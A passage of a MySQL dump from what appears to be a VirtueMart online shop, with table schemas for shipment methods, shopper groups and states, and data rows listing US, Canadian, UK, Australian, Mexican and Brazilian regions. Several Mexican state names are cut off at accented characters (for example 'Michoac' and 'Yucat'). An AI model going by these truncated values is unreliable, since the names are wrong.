  `virtuemart_shoppergroup_id` smallint unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `i_virtuemart_shipmentmethod_id` (`virtuemart_shipmentmethod_id`,`virtuemart_shoppergroup_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='xref table for shipment to shoppergroup';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_shipmentmethod_shoppergroups`
--

LOCK TABLES `myaou_virtuemart_shipmentmethod_shoppergroups` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_shipmentmethod_shoppergroups` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_shipmentmethod_shoppergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_shipmentmethods`
--

DROP TABLE IF EXISTS `myaou_virtuemart_shipmentmethods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_shipmentmethods` (
  `virtuemart_shipmentmethod_id` mediumint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` smallint NOT NULL DEFAULT '1',
  `shipment_jplugin_id` int NOT NULL DEFAULT '0',
  `shipment_element` char(50) NOT NULL DEFAULT '',
  `shipment_params` varchar(19000) DEFAULT NULL,
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_shipmentmethod_id`),
  KEY `idx_shipment_jplugin_id` (`shipment_jplugin_id`),
  KEY `idx_shipment_element` (`shipment_element`,`virtuemart_vendor_id`),
  KEY `idx_shipment_method_ordering` (`ordering`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Shipment created from the shipment plugins';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_shipmentmethods`
--

LOCK TABLES `myaou_virtuemart_shipmentmethods` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_shipmentmethods` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_shipmentmethods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_shipmentmethods_en_gb`
--

DROP TABLE IF EXISTS `myaou_virtuemart_shipmentmethods_en_gb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_shipmentmethods_en_gb` (
  `virtuemart_shipmentmethod_id` int unsigned NOT NULL,
  `shipment_name` char(180) NOT NULL DEFAULT '',
  `shipment_desc` varchar(19000) NOT NULL DEFAULT '',
  `slug` char(192) NOT NULL DEFAULT '',
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_shipmentmethods_en_gb`
--

LOCK TABLES `myaou_virtuemart_shipmentmethods_en_gb` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_shipmentmethods_en_gb` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_shipmentmethods_en_gb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_shipmentmethods_tr_tr`
--

DROP TABLE IF EXISTS `myaou_virtuemart_shipmentmethods_tr_tr`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_shipmentmethods_tr_tr` (
  `virtuemart_shipmentmethod_id` int unsigned NOT NULL,
  `shipment_name` char(180) NOT NULL DEFAULT '',
  `shipment_desc` varchar(19000) NOT NULL DEFAULT '',
  `slug` char(192) NOT NULL DEFAULT '',
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_shipmentmethods_tr_tr`
--

LOCK TABLES `myaou_virtuemart_shipmentmethods_tr_tr` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_shipmentmethods_tr_tr` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_shipmentmethods_tr_tr` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_shoppergroups`
--

DROP TABLE IF EXISTS `myaou_virtuemart_shoppergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_shoppergroups` (
  `virtuemart_shoppergroup_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` smallint NOT NULL DEFAULT '1',
  `shopper_group_name` char(128) DEFAULT NULL,
  `shopper_group_desc` char(255) DEFAULT NULL,
  `custom_price_display` tinyint(1) NOT NULL DEFAULT '0',
  `price_display` blob,
  `default` tinyint(1) NOT NULL DEFAULT '0',
  `sgrp_additional` tinyint(1) NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_shoppergroup_id`),
  KEY `idx_shopper_group_virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `idx_shopper_group_name` (`shopper_group_name`),
  KEY `i_ordering` (`ordering`),
  KEY `i_shared` (`shared`),
  KEY `i_published` (`published`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb3 COMMENT='Shopper Groups that users can be assigned to';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_shoppergroups`
--

LOCK TABLES `myaou_virtuemart_shoppergroups` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_shoppergroups` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_shoppergroups` VALUES (2,1,'COM_VIRTUEMART_SHOPPERGROUP_DEFAULT','COM_VIRTUEMART_SHOPPERGROUP_DEFAULT_TIP',0,NULL,1,0,0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(1,1,'COM_VIRTUEMART_SHOPPERGROUP_GUEST','COM_VIRTUEMART_SHOPPERGROUP_GUEST_TIP',0,NULL,2,0,0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `myaou_virtuemart_shoppergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_states`
--

DROP TABLE IF EXISTS `myaou_virtuemart_states`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_states` (
  `virtuemart_state_id` smallint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` smallint unsigned NOT NULL DEFAULT '1',
  `virtuemart_country_id` smallint unsigned NOT NULL DEFAULT '1',
  `virtuemart_worldzone_id` smallint unsigned NOT NULL DEFAULT '0',
  `state_name` char(64) DEFAULT NULL,
  `state_3_code` char(3) DEFAULT NULL,
  `state_2_code` char(2) DEFAULT NULL,
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_state_id`),
  UNIQUE KEY `idx_state_3_code` (`virtuemart_vendor_id`,`virtuemart_country_id`,`state_3_code`),
  UNIQUE KEY `idx_state_2_code` (`virtuemart_vendor_id`,`virtuemart_country_id`,`state_2_code`),
  KEY `i_virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `i_virtuemart_country_id` (`virtuemart_country_id`),
  KEY `i_ordering` (`ordering`),
  KEY `i_shared` (`shared`),
  KEY `i_published` (`published`)
) ENGINE=MyISAM AUTO_INCREMENT=730 DEFAULT CHARSET=utf8mb3 COMMENT='States that are assigned to a country';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_states`
--

LOCK TABLES `myaou_virtuemart_states` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_states` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_states` VALUES (1,1,223,0,'Alabama','ALA','AL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(2,1,223,0,'Alaska','ALK','AK',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(3,1,223,0,'Arizona','ARZ','AZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(4,1,223,0,'Arkansas','ARK','AR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(5,1,223,0,'California','CAL','CA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(6,1,223,0,'Colorado','COL','CO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(7,1,223,0,'Connecticut','CCT','CT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(8,1,223,0,'Delaware','DEL','DE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(9,1,223,0,'District Of Columbia','DOC','DC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(10,1,223,0,'Florida','FLO','FL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(11,1,223,0,'Georgia','GEA','GA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(12,1,223,0,'Hawaii','HWI','HI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(13,1,223,0,'Idaho','IDA','ID',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(14,1,223,0,'Illinois','ILL','IL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(15,1,223,0,'Indiana','IND','IN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(16,1,223,0,'Iowa','IOA','IA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(17,1,223,0,'Kansas','KAS','KS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(18,1,223,0,'Kentucky','KTY','KY',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(19,1,223,0,'Louisiana','LOA','LA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(20,1,223,0,'Maine','MAI','ME',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(21,1,223,0,'Maryland','MLD','MD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(22,1,223,0,'Massachusetts','MSA','MA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(23,1,223,0,'Michigan','MIC','MI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(24,1,223,0,'Minnesota','MIN','MN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(25,1,223,0,'Mississippi','MIS','MS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(26,1,223,0,'Missouri','MIO','MO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(27,1,223,0,'Montana','MOT','MT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(28,1,223,0,'Nebraska','NEB','NE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(29,1,223,0,'Nevada','NEV','NV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(30,1,223,0,'New Hampshire','NEH','NH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(31,1,223,0,'New Jersey','NEJ','NJ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(32,1,223,0,'New Mexico','NEM','NM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(33,1,223,0,'New York','NEY','NY',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(34,1,223,0,'North Carolina','NOC','NC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(35,1,223,0,'North Dakota','NOD','ND',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(36,1,223,0,'Ohio','OHI','OH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(37,1,223,0,'Oklahoma','OKL','OK',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(38,1,223,0,'Oregon','ORN','OR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(39,1,223,0,'Pennsylvania','PEA','PA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(40,1,223,0,'Rhode Island','RHI','RI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(41,1,223,0,'South Carolina','SOC','SC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(42,1,223,0,'South Dakota','SOD','SD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(43,1,223,0,'Tennessee','TEN','TN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(44,1,223,0,'Texas','TXS','TX',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(45,1,223,0,'Utah','UTA','UT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(46,1,223,0,'Vermont','VMT','VT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(47,1,223,0,'Virginia','VIA','VA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(48,1,223,0,'Washington','WAS','WA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(49,1,223,0,'West Virginia','WEV','WV',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(50,1,223,0,'Wisconsin','WIS','WI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(51,1,223,0,'Wyoming','WYO','WY',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(52,1,38,0,'Alberta','ALB','AB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(53,1,38,0,'British Columbia','BRC','BC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(54,1,38,0,'Manitoba','MAB','MB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(55,1,38,0,'New Brunswick','NEB','NB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(56,1,38,0,'Newfoundland and Labrador','NFL','NL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(57,1,38,0,'Northwest Territories','NWT','NT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(58,1,38,0,'Nova Scotia','NOS','NS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(59,1,38,0,'Nunavut','NUT','NU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(60,1,38,0,'Ontario','ONT','ON',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(61,1,38,0,'Prince Edward Island','PEI','PE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(62,1,38,0,'Quebec','QEC','QC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(63,1,38,0,'Saskatchewan','SAK','SK',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(64,1,38,0,'Yukon','YUT','YT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(65,1,222,0,'England','ENG','EN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(66,1,222,0,'Northern Ireland','NOI','NI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(67,1,222,0,'Scotland','SCO','SD',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(68,1,222,0,'Wales','WLS','WS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(69,1,13,0,'Australian Capital Territory','ACT','AC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(70,1,13,0,'New South Wales','NSW','NS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(71,1,13,0,'Northern Territory','NOT','NT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(72,1,13,0,'Queensland','QLD','QL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(73,1,13,0,'South Australia','SOA','SA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(74,1,13,0,'Tasmania','TAS','TS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(75,1,13,0,'Victoria','VIC','VI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(76,1,13,0,'Western Australia','WEA','WA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(77,1,138,0,'Aguascalientes','AGS','AG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(78,1,138,0,'Baja California Norte','BCN','BN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(79,1,138,0,'Baja California Sur','BCS','BS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(80,1,138,0,'Campeche','CAM','CA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(81,1,138,0,'Chiapas','CHI','CS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(82,1,138,0,'Chihuahua','CHA','CH',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(83,1,138,0,'Coahuila','COA','CO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(84,1,138,0,'Colima','COL','CM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(85,1,138,0,'Distrito Federal','DFM','DF',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(86,1,138,0,'Durango','DGO','DO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(87,1,138,0,'Guanajuato','GTO','GO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(88,1,138,0,'Guerrero','GRO','GU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(89,1,138,0,'Hidalgo','HGO','HI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(90,1,138,0,'Jalisco','JAL','JA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(91,1,138,0,'M','EDM','EM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(92,1,138,0,'Michoac','MCN','MI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(93,1,138,0,'Morelos','MOR','MO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(94,1,138,0,'Nayarit','NAY','NY',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(95,1,138,0,'Nuevo Le','NUL','NL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(96,1,138,0,'Oaxaca','OAX','OA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(97,1,138,0,'Puebla','PUE','PU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(98,1,138,0,'Quer','QRO','QU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(99,1,138,0,'Quintana Roo','QUR','QR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(100,1,138,0,'San Luis Potos','SLP','SP',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(101,1,138,0,'Sinaloa','SIN','SI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(102,1,138,0,'Sonora','SON','SO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(103,1,138,0,'Tabasco','TAB','TA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(104,1,138,0,'Tamaulipas','TAM','TM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(105,1,138,0,'Tlaxcala','TLX','TX',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(106,1,138,0,'Veracruz','VER','VZ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(107,1,138,0,'Yucat','YUC','YU',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(108,1,138,0,'Zacatecas','ZAC','ZA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(109,1,30,0,'Acre','ACR','AC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(110,1,30,0,'Alagoas','ALG','AL',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(111,1,30,0,'Amapá','AMP','AP',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(112,1,30,0,'Amazonas','AMZ','AM',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(113,1,30,0,'Bahía','BAH','BA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(114,1,30,0,'Ceará','CEA','CE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(115,1,30,0,'Distrito Federal','DFB','DF',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(116,1,30,0,'Espírito Santo','ESS','ES',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(117,1,30,0,'Goiás','GOI','GO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(118,1,30,0,'Maranhão','MAR','MA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(119,1,30,0,'Mato Grosso','MAT','MT',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(120,1,30,0,'Mato Grosso do Sul','MGS','MS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(121,1,30,0,'Minas Gerais','MIG','MG',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(122,1,30,0,'Paraná','PAR','PR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(123,1,30,0,'Paraíba','PRB','PB',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(124,1,30,0,'Pará','PAB','PA',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(125,1,30,0,'Pernambuco','PER','PE',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(126,1,30,0,'Piauí','PIA','PI',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(127,1,30,0,'Rio Grande do Norte','RGN','RN',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(128,1,30,0,'Rio Grande do Sul','RGS','RS',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(129,1,30,0,'Rio de Janeiro','RDJ','RJ',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(130,1,30,0,'Rondônia','RON','RO',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(131,1,30,0,'Roraima','ROR','RR',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(132,1,30,0,'Santa Catarina','SAC','SC',0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 